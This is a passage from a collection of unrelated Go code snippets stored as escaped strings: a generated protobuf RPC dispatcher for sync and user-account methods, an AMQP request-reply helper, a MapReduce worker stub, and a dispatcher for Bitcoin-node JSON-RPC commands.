load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_OtherResponse_Echo\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_OtherResponse_Echo\",\"RPC_Other.Echo\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_Sync\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Sync\n\t\trpc := rpcHandler.RPC_Sync\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Sync\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"GetGeneralUpdates\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_GetGeneralUpdates{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetGeneralUpdates(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.GetGeneralUpdates\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_GetGeneralUpdates\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetGeneralUpdates\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetGeneralUpdates\",\"RPC_Sync.GetGeneralUpdates\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetNotifyUpdates\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_GetNotifyUpdates{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetNotifyUpdates(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.GetNotifyUpdates\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_GetNotifyUpdates\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetNotifyUpdates\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetNotifyUpdates\",\"RPC_Sync.GetNotifyUpdates\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetLastSyncDirectUpdateId\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_SetLastSyncDirectUpdateId{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetLastSyncDirectUpdateId(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.SetLastSyncDirectUpdateId\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_SetLastSyncDirectUpdateId\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncDirectUpdateId\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncDirectUpdateId\",\"RPC_Sync.SetLastSyncDirectUpdateId\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetLastSyncGeneralUpdateId\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_SetLastSyncGeneralUpdateId{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetLastSyncGeneralUpdateId(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.SetLastSyncGeneralUpdateId\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_SetLastSyncGeneralUpdateId\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncGeneralUpdateId\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncGeneralUpdateId\",\"RPC_Sync.SetLastSyncGeneralUpdateId\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetLastSyncNotifyUpdateId\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_SetLastSyncNotifyUpdateId{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetLastSyncNotifyUpdateId(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.SetLastSyncNotifyUpdateId\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_SetLastSyncNotifyUpdateId\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncNotifyUpdateId\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncNotifyUpdateId\",\"RPC_Sync.SetLastSyncNotifyUpdateId\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_UserOffline\":\n\n\t\t//rpc,ok := rpcHandler.RPC_UserOffline\n\t\trpc := rpcHandler.RPC_UserOffline\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_UserOffline\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"BlockUser\": //each pb_service_method\n\t\t\tload := &PB_UserParam_BlockUser{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.BlockUser(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.BlockUser\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_BlockUser\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_BlockUser\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_BlockUser\",\"RPC_UserOffline.BlockUser\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"UnBlockUser\": //each pb_service_method\n\t\t\tload := &PB_UserParam_UnBlockUser{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.UnBlockUser(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.UnBlockUser\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_UnBlockUser\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UnBlockUser\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UnBlockUser\",\"RPC_UserOffline.UnBlockUser\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"UpdateAbout\": //each pb_service_method\n\t\t\tload := &PB_UserParam_UpdateAbout{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.UpdateAbout(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.UpdateAbout\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_UpdateAbout\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateAbout\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateAbout\",\"RPC_UserOffline.UpdateAbout\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"UpdateUserName\": //each pb_service_method\n\t\t\tload := &PB_UserParam_UpdateUserName{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.UpdateUserName(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.UpdateUserName\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_UpdateUserName\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateUserName\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateUserName\",\"RPC_UserOffline.UpdateUserName\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"ChangePrivacy\": //each pb_service_method\n\t\t\tload := &PB_UserParam_ChangePrivacy{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.ChangePrivacy(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.ChangePrivacy\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponseOffline_ChangePrivacy\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponseOffline_ChangePrivacy\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponseOffline_ChangePrivacy\",\"RPC_UserOffline.ChangePrivacy\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"ChangeAvatar\": //each pb_service_method\n\t\t\tload := &PB_UserParam_ChangeAvatar{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.ChangeAvatar(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.ChangeAvatar\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_ChangeAvatar\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_ChangeAvatar\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_ChangeAvatar\",\"RPC_UserOffline.ChangeAvatar\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_User\":\n\n\t\t//rpc,ok := rpcHandler.RPC_User\n\t\trpc := rpcHandler.RPC_User\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_User\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"CheckUserName\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.CheckUserName(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_User.CheckUserName\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName\",\"RPC_User.CheckUserName\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetBlockedList\": //each pb_service_method\n\t\t\tload := &PB_UserParam_BlockedList{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetBlockedList(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_User.GetBlockedList\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_BlockedList\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_BlockedList\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_BlockedList\",\"RPC_User.GetBlockedList\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tdefault:\n\t\tnoDevErr(errors.New(\"rpc dosent exisit for: \" + cmd.Command))\n\t}\n}", "func Rpc(queue string, message interface{}, conn *amqp.Connection, l *logging.Logger) ([]byte, error) {\n\n\tl.Info(\"Executing RPC to queue: %s\", queue)\n\tl.Debug(\"Getting Channel for RPC\")\n\tchannel, err := conn.Channel()\n\tdefer channel.Close()\n\tl.Debug(\"Got Channel for RPC\")\n\n\tvar q amqp.Queue\n\tvar msgs <-chan amqp.Delivery\n\n\tl.Debug(\"Declaring Queue for RPC\")\n\tq, err = channel.QueueDeclare(\n\t\t\"\",\n\t\tfalse,\n\t\tfalse,\n\t\ttrue,\n\t\tfalse,\n\t\tnil,\n\t)\n\tif err != nil {\n\t\tdebug.PrintStack()\n\t\tl.Errorf(\"Failed to declare a queue: %v\", err)\n\t\treturn nil, err\n\t}\n\tl.Debug(\"Declared Queue for RPC\")\n\tl.Debug(\"Registering consumer for RPC\")\n\tmsgs, err = channel.Consume(\n\t\tq.Name,\n\t\t\"\",\n\t\ttrue,\n\t\tfalse,\n\t\tfalse,\n\t\tfalse,\n\t\tnil,\n\t)\n\tif err != nil {\n\t\tdebug.PrintStack()\n\t\tl.Errorf(\"Failed to register a consumer: %v\", err)\n\t\treturn nil, err\n\t}\n\n\tl.Debug(\"Registered consumer for RPC\")\n\tcorrId := randomString(32)\n\n\tmrs, err := json.Marshal(message)\n\tif err != nil {\n\t\tl.Errorf(\"Error while marshaling: %v\", err)\n\t\treturn nil, err\n\t}\n\tl.Debug(\"Publishing message to queue %s\", queue)\n\terr = channel.Publish(\n\t\tOpenbatonExchangeName, // exchange\n\t\tqueue, // routing key\n\t\tfalse, // mandatory\n\t\tfalse, // immediate\n\t\tamqp.Publishing{\n\t\t\tContentType: AmqpContentType,\n\t\t\tCorrelationId: corrId,\n\t\t\tReplyTo: q.Name,\n\t\t\tBody: []byte(mrs),\n\t\t})\n\n\tif err != nil {\n\t\tl.Errorf(\"Failed to publish a message\")\n\t\treturn nil, err\n\t}\n\tl.Debugf(\"Published message to queue %s\", queue)\n\n\tfor d := range msgs {\n\t\tif corrId == d.CorrelationId {\n\t\t\tl.Debug(\"Received Response\")\n\t\t\treturn d.Body, nil\n\t\t}\n\t}\n\treturn nil, errors.New(fmt.Sprintf(\"Not found message with correlationId [%s]\", corrId))\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\tw := worker{}\n\tw.mapf = mapf\n\tw.reducef = reducef\n\tw.register()\n\tw.check()\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func RunAPI(server *Server, quit qu.C) {\n\tnrh := RPCHandlers\n\tgo func() {\n\t\tD.Ln(\"starting up node cAPI\")\n\t\tvar e error\n\t\tvar res interface{}\n\t\tfor {\n\t\t\tselect { \n\t\t\tcase msg := <-nrh[\"addnode\"].Call:\n\t\t\t\tif res, e = nrh[\"addnode\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.AddNodeCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan AddNodeRes) <-AddNodeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"createrawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"createrawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.CreateRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan CreateRawTransactionRes) <-CreateRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"decoderawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"decoderawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.DecodeRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.TxRawDecodeResult); ok { \n\t\t\t\t\tmsg.Ch.(chan DecodeRawTransactionRes) <-DecodeRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"decodescript\"].Call:\n\t\t\t\tif res, e = nrh[\"decodescript\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.DecodeScriptCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.DecodeScriptResult); ok { \n\t\t\t\t\tmsg.Ch.(chan DecodeScriptRes) <-DecodeScriptRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"estimatefee\"].Call:\n\t\t\t\tif res, e = nrh[\"estimatefee\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.EstimateFeeCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(float64); ok { \n\t\t\t\t\tmsg.Ch.(chan EstimateFeeRes) <-EstimateFeeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"generate\"].Call:\n\t\t\t\tif res, e = nrh[\"generate\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]string); ok { \n\t\t\t\t\tmsg.Ch.(chan GenerateRes) <-GenerateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getaddednodeinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getaddednodeinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetAddedNodeInfoCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.GetAddedNodeInfoResultAddr); ok { \n\t\t\t\t\tmsg.Ch.(chan GetAddedNodeInfoRes) <-GetAddedNodeInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getbestblock\"].Call:\n\t\t\t\tif res, e = nrh[\"getbestblock\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBestBlockResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBestBlockRes) <-GetBestBlockRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getbestblockhash\"].Call:\n\t\t\t\tif res, e = nrh[\"getbestblockhash\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBestBlockHashRes) <-GetBestBlockHashRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblock\"].Call:\n\t\t\t\tif res, e = nrh[\"getblock\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBlockVerboseResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockRes) <-GetBlockRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockchaininfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockchaininfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBlockChainInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockChainInfoRes) <-GetBlockChainInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockcount\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockcount\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(int64); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockCountRes) <-GetBlockCountRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockhash\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockhash\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockHashCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockHashRes) <-GetBlockHashRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockheader\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockheader\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockHeaderCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBlockHeaderVerboseResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockHeaderRes) <-GetBlockHeaderRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblocktemplate\"].Call:\n\t\t\t\tif res, e = nrh[\"getblocktemplate\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockTemplateCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockTemplateRes) <-GetBlockTemplateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getcfilter\"].Call:\n\t\t\t\tif res, e = nrh[\"getcfilter\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetCFilterCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetCFilterRes) <-GetCFilterRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getcfilterheader\"].Call:\n\t\t\t\tif res, e = nrh[\"getcfilterheader\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetCFilterHeaderCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetCFilterHeaderRes) <-GetCFilterHeaderRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getconnectioncount\"].Call:\n\t\t\t\tif res, e = nrh[\"getconnectioncount\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(int32); ok { \n\t\t\t\t\tmsg.Ch.(chan GetConnectionCountRes) <-GetConnectionCountRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getcurrentnet\"].Call:\n\t\t\t\tif res, e = nrh[\"getcurrentnet\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetCurrentNetRes) <-GetCurrentNetRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getdifficulty\"].Call:\n\t\t\t\tif res, e = nrh[\"getdifficulty\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetDifficultyCmd), nil); E.Chk(e) 